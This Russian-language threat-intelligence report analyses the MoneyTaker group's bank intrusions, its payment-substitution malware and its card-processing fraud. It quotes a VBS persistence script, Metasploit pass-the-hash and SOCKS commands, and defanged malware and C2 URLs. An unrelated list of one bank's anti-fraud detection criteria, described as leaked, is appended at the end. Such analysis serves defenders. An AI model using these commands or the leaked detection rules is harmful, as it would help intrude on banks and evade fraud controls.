Хакеры стараются оставаться как можно незаметнее и для этого они используют «бестелесные» программы, которые работают только в оперативной памяти и уничтожаются после перезагрузки.
Для закрепления в системе атакующие используют скрипты на PowerShell, VBS.
Скрипты дают ряд преимуществ:
• Вредоносные скрипты также тяжело обнаружить средствами антивирусной защиты. Написать сигнатуру на скрипт без ложно положительных срабатываний гораздо сложнее, чем на бинарный файл.
• Скрипты легко модифицировать, что облегчает труд атакующих.
• Легко обеспечить персистентность. Обычно такие скрипты сохраняются в реестре или вызываются при наступлении определенных событий через Windows Management Instrumentation (WMI), Group Policy Objects (GPOs), Scheduled task. Такие скрипты очень просты и обычно их основная задача, загрузить основную программу из внешнего или локального источника и запустить ее.
Задача Persistence сервера отдать вредоносный файл для запуска, если атакованный компьютер был перезагружен. Особенностью этой группы является использование отдельного сервера для этой роли. На него они размещают скрипт, который делает две проверки:
1. Поле User-agent равно WinHttp. Если не равно, то возвращает ошибку вебсервера 404. Если равно WinHttp, то переходит ко второй проверке.
2. IP-адрес, с которого осуществляется запрос находится в белом списке. Если да, то отдается вредоносный файл mencstager.exe! Если не находится, отдается rundll32.exe – легитимный файл ОС Windows.
Такая проверка осложняет жизнь для исследователей, которые не могут получить вредоносный файл из-за того, что они пытаются скачать его с IP-адреса, который не в белом списке.

ЗАКРЕПЛЕНИЕ В СИСТЕМЕ
В отличие от других групп, проводящих целенаправленные атаки, методы закрепления в системе у MoneyTaker довольно стандартные.
В инцидентах осенью 2016 года в России не удалось восстановить полную картину, поскольку после успешной атаки следы были грамотно уничтожены. Однако в одном из случаев мы выяснили, что атака на один из российских банков начиналась с проникновения на личный (домашний) компьютер администратора финансовой организации и уже через него был получен доступ в корпоративную сеть банка.
Одним из методов закрепления в системе было создание с помощью bat-скриптов сервисов, которые запускали VNC-сервер.
Содержимое файла at1.bat
“c:\Program Files\Cisco Systems\VPN Client\hostsec32.exe” -install “Host Security Server”
Содержимое файла at2.bat
“c:\Program Files\Cisco Systems\VPN Client\hostsec32.exe” -uninstall “host security server”
Вызов этих bat-скриптов производился из Windows Task Scheduler.
Set oWS = WScript.CreateObject(“WScript.Shell”)
sLinkFile = “C:\Users\<%username%>\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\taskhost.lnk”
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = “C:\Users\<%username%>\AppData\Local\
Temp\taskhost.exe”
‘ oLink.Arguments = “”
‘ oLink.Description = “Task Scheduler”
‘ oLink.HotKey = “ALT+CTRL+F”
‘ oLink.IconLocation = “C:\Users\<%username%>\AppData\Local\Temp\taskhost.exe, 2”
‘ oLink.WindowStyle = “1”
‘ oLink.WorkingDirectory = “C:\Users\<%username%>\AppData\Local\Temp”
oLink.Save

ПЕРЕМЕЩЕНИЕ В СЕТИ
После успешного заражения одного из компьютеров и первичного закрепления в системе атакующим необходимо начать исследование локальной сети, чтобы получить права администратора домена и в конечном итоге захватить полный контроль над сетью.
Их основным инструментом для проведения атаки является Metasploit и именно его они использовали, чтобы проводить сетевую разведку, поиск уязвимых приложений, эксплуатацию уязвимостей, повышение прав в системах, сбор информации и многие другие действия.
Получение прав администратора
Чтобы повысить права до локального администратора (или локального пользователя SYSTEM), атакующие использовали различные модули-эксплоитов из стандартного набора Metasploit, либо обхода технологии UAC. Это позволило им использовать утилиту Mimikatz, которая подгружалась в память через meterpreter и предоставляла возможность извлечения паролей в открытом виде.
Кроме стандартных модулей из набора Metasploit используются следующие инструменты для повышения привилегий.
24483322_m.png

Интерес представляет файл ASLRSideChannelAttack.exe. Он скомпилирован 23 октября 2016 на основе кодов с российской конференции ZeroNights 2016, который опубликован в открытом доступе https://github.com/IOActive/I-know-where-your-page-lives.
Кроме того, они активно искали пароли, сохраненные в групповых политиках Active Directory, используя уязвимость MS14-025 и соответствующий модуль Metasploit (post/windows/gather/credentials/gpp).
Получив файлы групповых политик, атакующий расшифровывал пароли, которые в них сохранены и использовал их на остальных рабочих станциях. В некоторых случаях пароли в банках, предоставляющие права локального администратора, были очень слабыми. Вот пример паролей доменного администратора, которые восстановили атакующие:
24483323_m.png

Используя модули Metasploit, предоставляющие функционал дампа локального файла хешей Windows SAM (hashdump или smart_hashdump) они получали хеш NTLM локального администратора, а также хеш NTLM и пароль в открытом виде от доменных пользователей.
Распространения по сети
Для получения списка компьютеров в Active Directory часто используют PowerShell скрипт с именем allpc.ps1, который скопирован из этого обсуждения в октябре 2015 года:
https://serverfault.com/questions/732681/export-simple-list-of-all-computers-in-multiple-ous-in-ad
Для распространения по сети использовался модуль выполнения команд через штатный механизм psexec, который применяется для легального администрирования систем.
Данный механизм создает локальную службу через SMB/RPC, затем разово исполняет и удаляет ее. В свойствах службы на старт указывается нужная команда. Злоумышленник использовал два метода распространения нагрузки – публиковал в сетевой папке исполняемые файлы, и заставлял компьютеры-жертвы их запускать, либо указывал напрямую в строке запуска службы шелл-код.
Для паролей, которые были получены в виде хеша NTLM и не были расшифрованы, использовался механизм Pass-the-hash, который позволяет применять хеш NTLM для аутентификации без знания пароля. Для этого использовались все те же штатные модули psexec в Metasploit без какой-либо модификации.
use auxiliary/admin/smb/psexec _ command
set COMMAND start \\\\10.1.5.35\\tmp\\msc7.exe
set RHOSTS 10.1.5.35
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:23cec95759ea5880
adf1794f475c23cd
set SMBDomain WORKGROUP
После получения доступа к новым системам процесс сбора парольной информации повторялся.
Удаленный доступ
До октября 2017 для удаленного доступа они использовали стандартные инструменты Metasploit, а также обычные средства удаленного доступа. На хостах, где запущен Meterpreter, они поднимают Socks сервер, который дает им возможность удаленно отправлять команды внутри локальной сети. Для создания Socks-соединения, в основном они используют порты 7080 и 1808:
use auxiliary/server/socks4a
show options
set SRVHOST _ c2serverIP _
set SRVPORT 7080
Кроме этого, они активно используют различные VNC-клиенты, как из стандартного набора Fileless VNC, обычный VNC, UltraVNC и TightVNC Portable версии х32 и х64.
В США для удаленного доступа они используют решение LogMeIn Hamachi. В одном из инцидентов для обеспечения постоянного удаленного доступа они получили доступ к межсетевому экрану и настроили на нем туннель до сервера управления. Также для создания зашифрованного соединения между скомпрометированным компьютером и сервером атакующего они поднимают SSH-туннель с помощью легитимной утилиты plink.

Продолжение следует ….

Во второй части
СЛЕЖЕНИЕ ЗА ПОЛЬЗОВАТЕЛЕМ
АТАКА НА АРМ КБР
ВОЗМОЖНЫЕ АТАКИ НА SWIFT
АТАКА НА КАРТОЧНЫЙ ПРОЦЕССИНГ
ИСПОЛЬЗОВАНИЕ БАНКОВСКИХ ТРОЯНОВ
ИСПОЛЬЗОВАНИЕ POS-ТРОЯНОВ
 
MoneyTaker
Полтора года ниже радаров
(Часть 2.)


СЛЕЖЕНИЕ ЗА ПОЛЬЗОВАТЕЛЕМ
Для проведения успешной атаки необходимо иметь возможность следить за работой реальных операторов с внутренними системами.
Группа MoneyTaker использует несколько инструментов для этих целей:
• Легитимный инструмент NirCmd
• Самописный скриншотер и кейлоггер NirCmd – это маленькая консольная утилита, по функционалу схожая с psexec. Она позволяет удаленно выполнять множество команд: записывать и удалять значения и ключи в реестре, записывать значения в файл INI, подключаться к сети VPN, перезапускать или выключать компьютер, изменить созданную / измененную дату файла, изменить настройки дисплея, выключить монитор и многое другое.
Но одной из важных для атакующих функций является создание снимков экрана. Например, выполнив команду: nircmd.exe loop 10 60000 savescreenshot c:\temp\scr~$currdate.MM _ dd _ yyyy$-~$currtime.HH _ mm _ ss$.png
будет создано 10 скриншотов с интервалом 60 секунд. Но для атакующих этого функционала недостаточно и поэтому они создали свой уникальный скриншотер и кейлоггер.
24483324_m.png

Эти программы предназначены для перехвата вводимых пользователем клавиш, снятия скриншотов рабочего стола и перехвата содержимого буфера обмена. Все эти данные могут быть накоплены и сохранены в файл во временном каталоге.
Dropper
Является NSIS-установщиком. После своего запуска он создает следующие файлы.
%Temp%\datepicker-ru _ RU.js
%Temp%\LEJ%2BPamplona%2BSanta.jpg
%Temp%\roknewsflash.css
%Temp%\fonts.css
%Temp%\addons.css
%Temp%\tracker.php
%Temp%\mJ8OS5lCf8xFQQiX4F1Ei.sNXbnF1xay
%Temp%\<rnd _ chars>.tmp\System.dll
Дроппер дважды выполняет запуск собственного файла дочерним процессом. Дешифрует буфер данных, хранящийся в инсталляторе в зашифрованном виде, и внедряет его в дочерний процесс (запущенный последним). Таким образом достигается запуск полезной нагрузки.
Keylogger/Screenshotter
• Приложение скомпилировано в среде Delphi и содержит на главной форме компоненты текстового поля ввода и 5 таймеров.
• Исходя из названий компонентов на португальском, можно предположить авторство программиста либо назначение кампании как португалоязычной (например, бразильской), либо код основан на исходниках португальской программы.
24483325_m.png

• Те или иные функции приложения выполняются при очередном срабатывании таймера (спустя интервал времени, который в этом таймере указан, как интервал работы таймера).
• Из названий таймеров видно, что один из них назван для активации сетевых функций (InternetTimer), другой для отправки данных (EnviarTimer), но на деле выполняют иные функции. Вместо активации сетевых функций таймер «InternetTimer» просто активирует другой таймер, а таймер «EnviarTimer» (переводится как «таймер отправки») предназначен для сбора скриншотов и выгрузки собранных данных в файл во временном каталоге. Это может говорить о том, что исходный код исследуемого файла изначально писался для одних целей (включая сетевую отправку данных), а далее был немного модифицирован.
• После старта приложение выполняет метод TForm1. FormCreate(), в котором загружает в адресное пространство необходимые системные динамические библиотеки и ищет в них адреса функций WinExec, GetAsyncKeyState, GetWindowTextA, GetForegroundWindow KeyloggerTimer. При срабатывании таймера выполняет перехват нажатых клавиш на клавиатуре. При этом может извлекать название приложений (заголовка окна), в которых клавиша была нажата, дата\время нажатия.
Ниже приведен пример записи лога кейлогера. Жирным выделены нажимаемые клавиши или заголовки окон, в которых эти клавиши вводились:
24483326_m.png

• Результаты перехвата кейлогер записывает в объект TForm1.Memo1, расположенный на главной форме приложения. Отсюда данные далее могут быть получены для дальнейшей записи в файл во временном каталоге.
• EnviaTimer. С помощью api-функции GetClipboardData() может перехватывать содержимое буфера обмена
• В код таймера внедрена функция антиэмуляции для обхода антивирусов и средств автоматического анализа семплов на основе вызова функции ValidateName(). Предположительно этот метод антиэмуляции был скопирован из публичного источника (форум https://****av.ru/showpost.php?p=109096&postcount=63) и внедрен с ошибкой, из-за которой функции снятия скриншотов и записи данных в файл (которые по коду расположены после проверки наэмуляцию) могут не исполняться.
• Делает скриншот рабочего стола, компрессирует в JPEG и кодирует в base64
• Создает файл с именем “%Temp%\perflog1.tmp”
• Сетевого взаимодействия для отправки собранных данных в исследуемом файле обнаружено не было

АТАКА НА АРМ КБР
В августе 2016 года члены группы успешно взломали один из банков в России, где использовали программу для автоматического перевода денег через систему межбанковских переводов Центрального банка России АРМ КБР.

Получив доступ внутри банка к серверу АРМ КБР они загрузили инструмент, который сами назвали MoneyTaker v5.0. Это модульная программа. Главный модуль программы находится в каталоге «c:\intel\logs\1\mt\bin» и имеет имя «main.exe» или «igfxserv.exe». Это программа без сетевых взаимодействий и ее должны запустить с указанием главного конфигурационного файла в качестве аргумента. Осуществляет инициализацию в соответствии с конфигурационным файлом, проверяет наличие модулей, указанных в конфигурационном файле и бэкапы определенных каталогов АРМ КБР. Далее, в описании поведения файлов, зависимого от определенного конфигурационного параметра будет указываться имя параметра. Пример конфигурационного файла приведен в приложении.

Главный модуль — «Main.exe» или «IGFXSERV.exe»
Главный модуль запускается с указанием главного конфигурационного файла «c:\intel\logs\1\mt\config\main-config.txt». Модуль логирует все действия в файл «Main-Logfile». После запуска осуществляется поиск модулей XML, ED и TXT, указанных в конфигурации как «XmlBin» «EdBin» и «TxtBin» соответственно. Также осуществляется поиск их конфигурационных файлов, параметры: «XmlCfg» «EdCfg» и «TxtCfg». Конфигурационных файлов модулей в виде отдельных файлов может и не быть, в этом случае их настройки хранятся в одном файле «main-config.txt».
Считываются параметры «Directory» «Backup» «Recursive» «Action» и при помощи WINAPI функции «ReadDirectoryChangesW()» начинается слежение за файлами, появляющимися в каталогах, указанных в «Directory»
При появления нового файла осуществляется запуск соответствующего модуля (ED для каталога «chk», XML для каталога «cli» и TXT для каталога «tmp») и его копирование в директорию, указанную как «Backup».

24564533_m.png


Модуль автоподмены – «XML.EXE»
Файл «xml.exe» запускается главным модулем с указанием нового файла в каталоге «%АРМ КБР%\exq\cli» и файла конфигурации. Модуль автоподмены ведет подробные логи и записывает их в файл, указанный в конфигурации как «Xml-Logfile». В каталог «%АРМ КБР%\exq\cli» помещаются электронные сообщения, сформированные АС КБР для дальнейшей обработки компонентом шлюза «Входной контроль». Именно в этот момент осуществляется проверка модулем автоподмены xml файла на валидность и определение, является ли файл
электронного сообщения платежным поручением (имеет тип «ED101»).
Для ED101 осуществляется поиск полей «Purpose», «Payer», «PersonalAcc», «Payee», «Name», «Bank BIC», «CorrespAcc», «KPP», «INN», «SUM», «AccDocNo». Затем происходит считывание файла с реквизитами злоумышленников – «Xml-Workfile». Там указаны следующие поля: «name», «id», «acc», «inn», «kpp», «bik», «corr», «purpose».
Если удалось получить все необходимые поля у платежного поручения и в «Xml-Workfile» есть реквизиты, то осуществляется модификация xml документа платежного поручения. Туда записываются реквизиты из файла злоумышленников. При этом значение суммы платежа не изменяется, а для каждой замены у злоумышленников свой счет. Счета, на которые уходят деньги, не повторяются.
Успешность модификации обуславливается тем, что в этот момент платежное поручение еще не подписано, а подписываться будет уже платежное поручение с реквизитами мошенников.
Для дальнейшей работы другого модуля – ED, модуль XML после каждой автоподмены сохраняет информацию в «Xml-Resultfile» в следующем формате:
#
Id=
OrigAcc=
OrigBic=
OrigCor=
Purpose=
HackAcc=
HackBic=
HackCor=
Sum=
PayerPersonalAcc=
#

Модуль сокрытия – ED.EXE
Файл «ed.exe» запускается главным модулем с указанием нового файла в каталоге «%АРМ КБР%\exq\chk» и файла конфигурации. После того как платежное поручение было модифицировано, подписано и отправлено, происходят следующие действия:
• Оно (поручение) поступает на логический контроль, где проверяется правильность составления ЭПС, устанавливается соответствие реквизитов нормативно — справочной информации.
• Осуществляется контроль на возможность оплаты в пределах суммы ликвидных средств на банковском счете.
• ЭПС принимается к исполнению и производится списание средств со счета плательщика и зачисление на счет получателя.
• По результатам исполнения в адрес составителя направляется электронное сообщение ED206 (подтверждение дебета).
• Оно расшифровывается, распаковывается, проходит проверку кода аутентификации и защитного кода и сохраняется в каталоге «%АРМ КБР%\exq\chk».
• Главный модуль запускает модуль сокрытия с указанием поступившего электронного сообщения.
Модуль ED проверяет, является ли поступившее электронное сообщение ED206 (подтверждение дебета после списания) или ED211 (свернутая выписка, направляется по итогам дня или рейса).
Для ED206 проверяется поле «CorrAcc», для ED211 проверяется поле «PayeePersonalAcc». Значения этих полей сравниваются со значениями «HackAcc» в рабочем файле модуля ED (это файл, в который сохраняет информацию о прошедших заменах модуль XML).
Если значения совпадают, то выполняется замена, обратная той, что делал модуль XML.
Таким образом, платежное поручение отправляется и принимается к исполнению с реквизитами злоумышленника, а ответы приходят, словно реквизиты были исходными.
Это дает злоумышленникам дополнительное время до обнаружения хищений.

Модуль сокрытия с временными файлами – TXT.EXE
Главный модуль имеет возможность также запускать и модуль TXT с указанием временного файла АРМ КБР, но сам модуль получить не удалось и его назначение неизвестно.
Все модули MoneyTaker не имеют отображаемой информации и ведут активное логирование своих действий в лог файлы. Также есть возможность тестового запуска, которая выполняется после установки на ЭВМ, содержащую АРМ КБР. Это необходимо злоумышленникам для контроля процесса работы программы. После этой атаки они не провели ни одной новой атаки на АРМ КБР с использованием этого инструмента.

В ноябре 2017 злоумышленники снова получили доступ еще в один банк России, подобрались к серверам и рабочим местам операторов АРМ КБР, но воспользоваться MoneyTaker они не смогли из-за того, что сервер находился в полностью изолированном сегменте.
После неудачной попытки похитить деньги через систему межбанковских переводов они переключили свой фокус на систему карточного процессинга.

ВОЗМОЖНЫЕ АТАКИ НА SWIFT
Исследуя инфраструктуру атакующих, мы обнаружили, что они всегда стараются похищать внутреннюю документацию по работе с банковскими системами: руководства администраторов, внутренние инструкции и регламенты, формы заявок на внесение изменений, журналы транзакций и т.п.

Мы не обнаружили свидетельств успешных атак этой группы на системы SWIFT, а также не обнаружили связей с уже известными инцидентами, например, в Гонконге, Украине, Турции.
Однако, вместе с упомянутыми документами они ищут и копируют документы, связанные с работой SWIFT, что может свидетельствовать о готовящихся атаках. Сейчас в их распоряжение попали следующие документы:
• Installation and Administration Guide, для SWIFT Alliance Access 7.0
• Security Guide, для SWIFT Alliance Access 7.0
• System Administrator Procedures, для FedLink компании Ocean Systems
• User Procedures Manual, для FedLink компании Ocean Systems
Последние два документа представляют интерес, поскольку описывают, как используя эту систему, делать переводы через SWIFT. Согласно информации на сайте компании FedLink, сейчас у них более 200 клиентов в США и Латинской Америке. Возможно, что именно банки Латинской Америки будут следующей целью этой группы.
24564534_m.png


АТАКА НА КАРТОЧНЫЙ ПРОЦЕССИНГ
Первая атака на карточный процессинг, которую мы связали с это группой, была проведена в мае 2016. Получив доступ в сеть банка, они скомпрометировали рабочее место операторов FirstData STAR network portal, внесли необходимые изменения и сняли деньги. В январе 2017 атака повторилась уже в другом банке.
Атаки на карточный процессинг позволяют атакующим проводить атаки более безопасно для мулов, занимающихся обналичиванием. Атакующие находятся в одной стране, атакуемый банк - в другой, а обналичивание происходит в третьей. Эта схема не только более безопасна, но и более дешевая, что привлекает многих атакующих.

В общем схема очень проста:
• После получения контроля над банковской сетью, атакующие проверяли, есть ли возможность подключаться к системе управления карточным процессингом.
• Легально открывали или покупали доступные на рынке карты банка, в который они получили доступ.
• Мулы с открытыми заранее картами уезжали в другую страну, где ждали начала операции.
• Атакующие, используя доступ к карточному процессингу, убирали или увеличивали лимиты на снятие наличных для карт, с которыми уехали мулы.
• Убирали овердрафт лимиты, что позволяло уходить в минус даже по дебетовым картам.
• Мулы, используя эти карты, снимали наличные в одном банкомате, потому переходили к другому и так далее.
Средний ущерб от одной такой атаки составлял 0.5 миллиона долларов.

Как и в случае с атаками на SWIFT они собирают внутренние документы из банков, чтобы лучше понимать, как работать с определенными системами.

ИСПОЛЬЗОВАНИЕ БАНКОВСКИХ ТРОЯНОВ
Исследуя сервер управления, используемый для целенаправленных атак на банки, мы обнаружили два связанных файла:

24564535_m.png


Файл c4c.exe использует в качестве сервера управления адрес hххp://82.146.54.5/api/cfg.ashx
В паблике этот экземпляр распространялся под видом документа fedwire _ 22127061503 _ output _ report.doc (2818a0c63d729cb1f2d223e15c762209), который скачивал с сервера hxxp://188.120.235.201/fce2857010e1.exe (369ad5f7bc9a555f3395059978c720bb)

24564536_m.png


ИСПОЛЬЗОВАНИЕ POS-ТРОЯНОВ

Исследуя сервер управления, используемый для целенаправленных атак на банки, мы обнаружили два связанных файла:

24564537_m.png


В ноябре 2016 года компания Proofpoint описала массовую рассылку фишинговых писем по компаниям Великобритании и США. Фишинговые письма содержали документ с макросом
либо ссылку на фишинговый ресурс. При открытии документа происходила загрузка файла по ссылке hxxp://info.docs-sharepoint[.]com/officeup[.]exe, который является банковским трояном Kronos.
В нашем же случае файл 203.exe скачивался по ссылке: hххp://profile.invoice-sharepoint.com/Emplid/officeup.exe, в случае открытия файла LHarv.xls (de05666412026c6d6c4740b79bc71dbd
6420c0c62ad59cbadcd7d506614bc87d)

24564538_m.png


Банковский троян Kronos, описанный Proofpoint, загружал две полезных нагрузки:
hxxp://networkupdate[.]online/kbps/upload/c1c06f7d[.]exe - Smoke Loader
hxxp://networkupdate[.]online/kbps/upload/1f80ff71[.]exe - Smoke Loader
hxxp://networkupdate[.]online/kbps/upload/a8b05325[.]exe — ScanPOS
ScanPOS — это уникальный троян для кассовых аппаратов с подключенным POS-ерминалом. ScanPOS — собирает информацию о процессах, пользователях и привилегиях. Но основной функцией является дамп оперативной памяти и поиск данных банковских карт. Если данные карт были обнаружены, они проверяются по Luhn алгоритму, а затем отправляются на сервер управления. Адрес C&C для ScanPOS был hxxp://invoicesharepoint[.]com/ gateway[.]php
 
Критерии срабатывания антифрод системы онлайн платежей банка.
Слито одной из групп. Банк и актуальность неизвестна

  1. Проверка RSA Критерий срабатывает в том случае, когда проверка в RSA возвращает один из статусов, выбранных в параметрах критерия
  2. Присутствие IP-адреса в черном списке Критерий срабатывает, если IP-адрес(а) отправителя платежа присутствует(ют) в справочнике "Черный список IP-адресов"
  3. Присутствие MAC-адресa в черном списке Критерий срабатывает, если MAC-адрес отправителя присутствует в справочнике "Черный список МАС-адресов"
  4. Появление платежа в пользу нового получателя для данного счета отправителя Критерий срабатывает при осуществлении платежа в пользу нового/нехарактерного получателя. Если за анализируемый период количество платежей в пользу новых получателей превышает максимально допустимое, то считается, что определить характерность поведения невозможно, и критерий не срабатывает. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество платежей, найденных за анализируемый период, меньше минимально необходимого.
  5. Присутствие банка получателя в черном списке Критерий срабатывает, если банк получателя платежа присутствует в справочнике "Черный список банков получателя"
  6. Подозрительные фразы в назначении платежa Критерий срабатывает, если в назначении платежа присутствуют фразы, находящиеся в справочнике характерных для мошеннических действий фраз ("Справочник подозрительных фраз в назначении платежа")
  7. Нарушение сквозной нумерации платежей организации Критерий срабатывает, если максимальная разница между номером текущего платежа и ближайшим к нему номером платежа за последние 2 дня превышает максимально допустимое отклонение. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество платежей за анализируемый период меньше минимально необходимого.
  8. Смена IP-адресов Критерий срабатывает, если за анализируемый период времени с данного IP-адреса платежей не отправлялось. При частой смене IP-адресов отправки (превышение максимально допустимого количества значений) можно говорить о нехарактерности поведения клиента и критерий перестает срабатывать. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество фактов смены IP-адреса, найденных за анализируемый период, меньше минимально необходимого.
  9. Смена диапазона IP-адресов Критерий срабатывает, если IP-адрес платежа не попадает в диапазон IP-адресов платежей за анализируемый период времени. При частой смене диапазона IP-адресов (превышение максимально допустимого количества значений) можно говорить о нехарактерности поведения клиента и критерий перестает срабатывать. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество фактов смены диапазона IP-адресов, найденных за анализируемый период, меньше минимально необходимого.
  10. Смена оборудования Критерий срабатывает, если за анализируемый период времени с данного MAC-адреса платежи не отправлялись. При частой смене MAC-адресов (превышение максимально допустимого количества значений) можно говорить о нехарактерности поведения клиента и критерий перестает срабатывать. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество фактов смены MAC-адреса, найденных за анализируемый период, меньше минимально необходимого.
  11. Появление платежа на карточный счет/счет физического лица Критерий срабатывает при первом появлении платежа с данного счета плательщика на любой карточный счет/счет физического лица за анализируемый период.
  12. Появление платежа на сводный счет/счет заработной платы Критерий срабатывает при первом появлении платежа с данного счета плательщика на любой сводный счет/счет заработной платы за анализируемый период.
  13. Смена пароля Критерий срабатывает, если за анализируемый период клиент не менял пароль, а в день отправки платежа такая смена произошла, или же в том случае, если за анализируемый период смены пароля были, но платежи, отправленные в день смены пароля, были признаны мошенническими.
  14. Появление платежа на счет получателя с суммой выше предельной Критерий срабатывает при поступлении платежа с суммой, превышающей максимальную сумму за анализируемый период времени с учетом допустимого отклонения. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество платежей, найденных за анализируемый период, меньше минимально необходимого.
  15. Появление ошибочных платежей Критерий срабатывает, если за анализируемый период времени ошибочных платежей либо не было вообще, либо последний платеж, по которому данный критерий сработал, по результатам проверки оператором был признан мошенническим.
  16. Снижение предельного остатка на счете Критерий срабатывает при снижении остатка на счете до величины значительно меньшей предельной величины остатка за анализируемый период времени с учетом максимально допустимого отклонения. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество платежей, необходимых для определения предельной величины остатка на счете, найденных за анализируемый период, меньше минимально необходимого.
  17. Появление запросов выписки Критерий срабатывает, если за анализируемый период времени фактов появления ручного запроса выписки либо не было вообще, либо последний платеж, по которому данный критерий сработал, по результатам проверки оператором был признан мошенническим.
  18. Смена типового времени получения платежа Критерий срабатывает при смене характерного для данного клиента времени получения платежа. Если время получения платежа меняется слишком часто (превышение максимально допустимого количества значений) можно говорить о нехарактерности поведения клиента и критерий перестает срабатывать. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество платежей, необходимых для определения типового времени получения платежа, найденных за анализируемый период, меньше минимально необходимого.
  19. Подверженность клиента мошенническим атакам Критерий срабатывает, если за анализируемый период времени клиент подвергался мошенническим атакам в количестве, превышающем максимально допустимое.
  20. Несколько неудачных попыток ввода пароля при входе в систему Критерий срабатывает при превышении максимально допустимого количества неудачных попыток ввода пароля при входе в систему с учетом максимально допустимого отклонения. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество неудачных попыток ввода пароля, найденных за анализируемый период, меньше минимально необходимого.
  21. Превышение суточной суммы платежей за период Критерий срабатывает при превышении суточной суммы платежей за анализируемый период времени с учетом максимально допустимого отклонения. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество платежей, найденных за анализируемый период, меньше минимально необходимого.
  22. Превышение суточного количества платежей за период Критерий срабатывает при превышении суточного количества платежей за анализируемый период времени с учетом максимально допустимого отклонения. Выполнение проверки по критерию невозможно из-за недостаточности данных, если количество платежей, найденных за анализируемый период, меньше минимально необходимого.
  23. Подозрительные ФИО получателя Критерий срабатывает, если ФИО получателя присутствует в справочнике "Cправочник подозрительных ФИО получателей".
  24. Появление платежа на счет получателя с суммой выше средней Критерий срабатывает при поступлении платежа с суммой, превышающей среднюю сумму за анализируемый период времени с учетом допустимого отклонения.
  25. Отправка срочного платежа Критерий срабатывает, если платеж является срочным
  26. Появление платежа на депозитный счет физического лица Критерий срабатывает при первом появлении платежа с данного счета плательщика на любой депозитный счет физического лица за анализируемый период.
  27. Слишком малое время между формированием платежа и его отправкой Критерий срабатывает, если время между формированием платежа и его отправкой меньше минимально допустимого значения, указываемого в настройках критерия.
  28. Отправка платежа с незащищенного рабочего места Критерий срабатывает, если хотя бы один из включенных в настройках критерия параметров вернет значение FALSE.
  29. Отправка платежа клиентом с низким уровнем защиты Критерий срабатывает, если из ДБО приходит флаг использования SafeTouch, равный FALSE.
  30. Появление платежа с уже имеющимся номером Критерий срабатывает, если поступает платеж, номер которого уже встречался в ранее отправленном платеже за анализируемый период.
  31. Отправка платежа из другой страны Критерий срабатывает, если страна, из которой отправлен платеж, не совпадает с указанной в настройках
  32. Быстрая смена региона отправки платежа Критерий срабатывает, если регион, из которого отправлен проверяемый платеж не совпадает с регионом, из которого отправлен предыдущий платеж, и при этом время между этими платежами меньше указанного в настройках
  33. Присутствие ФИО получателя в базе утерянных паспортов Критерий срабатывает, если количество найденных записей с ФИО получателя больше 0 и не превышает максимально допустимого значения, указываемого в настройках. Во всех остальных случаях критерий не срабатывает.
  34. Присутствие ФИО руководителя компании в базе утерянных паспортов Критерий срабатывает, если ФИО руководителя присутствует в базе утерянных паспортов. Во всех остальных случаях критерий не срабатывает.
  35. Превышение допустимого количества решений арбитражного суда Критерий срабатывает, если для компании получателя платежа количество найденных судебных решений превышает допустимое значение. Во всех остальных случаях критерий не срабатывает.
  36. Превышение допустимого количества компаний, зарегистрированных по указанному адресу Критерий срабатывает при превышении допустимого количества компаний, которые могут быть зарегистрированы на юридический адрес получателя. В противном случае критерий не срабатывает.
  37. Учредитель компании получателя платежа является «массовым» учредителем Критерий срабатывает, если количество компаний, учрежденных руководителем компании получателя, превышает максимально допустимое.
  38. Частая смена руководителя компании получателя платежа Критерий срабатывает, если смена руководителя компании получателя платежа происходит чаще, чем указано в настройках критерия.
  39. Компания получатель платежа является новой Критерий срабатывает, если возраст компании (в днях) меньше заданного в настройках. В противном случае критерий не срабатывает.
  40. Компания получатель платежа является банкротом Критерий срабатывает, если получателем платежа является компания-банкрот, в противном случае критерий не срабатывает.
  41. Финансовое состояние компании получателя платежа является нестабильным Критерий срабатывает, если показатели ликвидности, рентабельности, деловой активности и финансовой устойчивости компании не соответствуют нормативным значениям. В противном случае критерий не срабатывает.
  42. Присутствие получателя в общем черном списке Критерий срабатывает, если получатель платежа (счет/номер карты+БИК+ИНН) присутствует в справочнике «Черный список получателей»;
  43. Присутствие получателя в клиентском черном списке Критерий срабатывает, если получатель платежа (счет/номер карты+БИК+ИНН) присутствует в справочнике «Справочник плательщиков» на вкладке «Черный список получателей»;
  44. Платеж на счет физического лица Критерий срабатывает, если получателем платежа является физическое лицо;
  45. Платеж на сводный счет Критерий срабатывает, если в поле счета получателя указан сводный счет Банка;
  46. Платеж в другой Банк Критерий срабатывает, если БИК банка-получателя не совпадает ни с одним из БИКов подразделений банка – отправителя;
  47. Превышение лимита платежей на счет получателя Критерий срабатывает, если за анализируемый период количество платежей со счета клиента на счет получателя превышает указанное в настройках критерия значение
  48. Присутствие получателя в общем белом списке Критерий срабатывает, если получатель платежа (счет/номер карты+БИК+ИНН) присутствует в справочнике «Белый список получателей»;
  49. Присутствие получателя в клиентском белом списке Критерий срабатывает, если получатель платежа (счет/номер карты+БИК+ИНН) присутствует в справочнике «Справочник плательщиков» на вкладке «Белый список получателей»;
  50. Платеж на карту Критерий срабатывает, если в качестве получателя платежа указан номер карты (числовая последовательность из 19/18/16/13 цифр)
  51. Платеж на указанные маски счета Критерий срабатывает, если счет получателя платежа соответствует одной из масок, перечисленных в настройках критерия;
  52. Сумма платежа меньше установленного лимита Критерий срабатывает, если в поле «Сумма платежа» значение суммы меньше указанного в настройках критерия значения;
  53. Сумма платежа больше установленного лимита Критерий срабатывает, если в поле «Сумма платежа» значение суммы больше указанного в настройках критерия значения;
  54. Платеж на нового получателя (банк) Критерий срабатывает, если ранее за всю историю загруженных в Систему платежей по Банку ни один из клиентов банка не отправлял платежей в пользу найденного счета получателя/номера карты, а сейчас такой платеж поступил;
